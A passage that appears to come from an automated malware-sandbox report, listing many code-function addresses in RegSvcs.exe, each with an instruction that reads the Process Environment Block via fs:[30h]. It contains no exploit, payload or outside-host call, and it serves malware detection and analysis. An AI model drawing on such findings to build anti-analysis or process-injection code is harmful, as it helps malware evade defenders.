            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016E41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01712073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01670050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01670050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01724015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01724015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016558EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016990AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01683B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01683B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01725BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01661B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01661B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016E4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01694A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01694A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01668A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01673A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01693D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01677D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016DA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01708DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017114FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]
